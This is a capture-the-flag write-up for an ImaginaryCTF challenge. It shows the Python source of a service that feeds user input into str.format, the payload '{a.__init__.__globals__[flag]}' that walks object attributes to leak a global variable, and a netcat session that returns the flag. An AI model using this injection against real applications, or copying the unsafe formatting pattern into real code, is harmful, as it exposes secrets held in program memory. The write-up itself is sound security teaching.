Skip to main content

FORMATTING

Description
Wait, I thought format strings were only in C???

Attachments
https://imaginaryctf.org/r/14BD-stonks.py nc chal.imaginaryctf.org 42014
#!/usr/bin/env python3

art = '''
88
,d 88
88 88
,adPPYba, MM88MMM ,adPPYba, 8b,dPPYba, 88 ,d8 ,adPPYba,
I8[ "" 88 a8" "8a 88P' `"8a 88 ,a8" I8[ ""
`"Y8ba, 88 8b d8 88 88 8888[ `"Y8ba,
aa ]8I 88, "8a, ,a8" 88 88 88`"Yba, aa ]8I
`"YbbdP"' "Y888 `"YbbdP"' 88 88 88 `Y8a `"YbbdP"'
'''

flag = open("flag.txt").read()

class stonkgenerator: # I heard object oriented programming is popular
def __init__(self):
pass
def __str__(self):
return "stonks"

def main():
print(art)
print("Welcome to Stonks as a Service!")
print("Enter any input, and we'll say it back to you with any '{a}' replaced with 'stonks'! Try it out!")
while True:
inp = input("> ")
print(inp.format(a=stonkgenerator()))

if __name__ == "__main__":
main()

Here we have to abuse format function to leak the flag variable.

We will use this format string vulnerability

Payload :

{a.__init__.__globals__[flag]}
$ ncat chal.imaginaryctf.org 42014

88
,d 88
88 88
,adPPYba, MM88MMM ,adPPYba, 8b,dPPYba, 88 ,d8 ,adPPYba,
I8[ "" 88 a8" "8a 88P' `"8a 88 ,a8" I8[ ""
`"Y8ba, 88 8b d8 88 88 8888[ `"Y8ba,
aa ]8I 88, "8a, ,a8" 88 88 88`"Yba, aa ]8I
`"YbbdP"' "Y888 `"YbbdP"' 88 88 88 `Y8a `"YbbdP"'

Welcome to Stonks as a Service!
Enter any input, and we'll say it back to you with any '{a}' replaced with 'stonks'! Try it out!
> {a.__init__.__globals__[flag]}
ictf{c4r3rul_w1th_f0rmat_str1ngs_4a2bd219}

flag : ictf{c4r3rul_w1th_f0rmat_str1ngs_4a2bd219}